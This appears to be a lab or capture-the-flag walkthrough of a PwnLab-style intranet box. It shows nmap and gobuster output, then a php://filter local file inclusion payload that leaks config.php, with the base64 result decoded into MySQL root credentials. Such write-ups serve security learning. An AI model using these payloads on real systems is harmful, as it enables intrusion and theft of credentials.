Pwned Date - 10th August 2022

Enumeration

PORT      STATE SERVICE VERSION
80/tcp    open  http    Apache httpd 2.4.10 ((Debian))
|_http-title: PwnLab Intranet Image Hosting
|_http-server-header: Apache/2.4.10 (Debian)
111/tcp   open  rpcbind 2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100024  1          33723/tcp   status
|   100024  1          34953/udp   status
|   100024  1          56543/udp6  status
|_  100024  1          57090/tcp6  status
3306/tcp  open  mysql   MySQL 5.5.47-0+deb8u1
| mysql-info: 
|   Protocol: 10
|   Version: 5.5.47-0+deb8u1
|   Thread ID: 46
|   Capabilities flags: 63487
|   Some Capabilities: Speaks41ProtocolOld, DontAllowDatabaseTableColumn, Support41Auth, SupportsTransactions, IgnoreSigpipes, InteractiveClient, Speaks41ProtocolNew, SupportsCompression, ODBCClient, IgnoreSpaceBeforeParenthesis, FoundRows, LongColumnFlag, ConnectWithDatabase, LongPassword, SupportsLoadDataLocal, SupportsMultipleResults, SupportsMultipleStatments, SupportsAuthPlugins
|   Status: Autocommit
|   Salt: -`zelog9%M6dvE5vvl;#
|_  Auth Plugin Name: mysql_native_password
33723/tcp open  status  1 (RPC #100024)

Untitled

We can fuzz the directory and we found /config.php but its blank…

┌──(kali㉿kali)-[~]
└─$ gobuster dir -u 192.168.234.29 -w /usr/share/wordlists/dirb/common.txt -q -t 200 -x php
/.hta                 (Status: 403) [Size: 293]
/.htpasswd.php        (Status: 403) [Size: 302]
/.htaccess            (Status: 403) [Size: 298]
/.htaccess.php        (Status: 403) [Size: 302]
/.htpasswd            (Status: 403) [Size: 298]
/.hta.php             (Status: 403) [Size: 297]
/config.php           (Status: 200) [Size: 0]  
/images               (Status: 301) [Size: 317] [--> <http://192.168.234.29/images/>]
/index.php            (Status: 200) [Size: 332]                                    
/index.php            (Status: 200) [Size: 332]                                    
/login.php            (Status: 200) [Size: 250]                                    
/server-status        (Status: 403) [Size: 302]                                    
/upload               (Status: 301) [Size: 317] [--> <http://192.168.234.29/upload/>]
/upload.php           (Status: 200) [Size: 19]

We tried to login with default credentials but then we got redirected to

<http://192.168.234.29/?page=login>

Exploitation

Remember back when HackTheBox Academy has the File Inclusion module, we we got this website

Interesting Local File Inclusion method

Where it says we can do this to get our desire file

<http://www.somesite.com/?page=php://filter/convert.base64-encode/resource=in.php>

So we tried the following payload on the URL

<http://192.168.234.29/?page=php://filter/convert.base64-encode/resource=config>

Indeed we got this string:

Untitled

PD9waHANCiRzZXJ2ZXIJICA9ICJsb2NhbGhvc3QiOw0KJHVzZXJuYW1lID0gInJvb3QiOw0KJHBhc3N3b3JkID0gIkg0dSVRSl9IOTkiOw0KJGRhdGFiYXNlID0gIlVzZXJzIjsNCj8+</center>

After decoding we got this

<?php
$server	  = "localhost";
$username = "root";
$password = "H4u%QJ_H99";
$database = "Users";
?>ǧ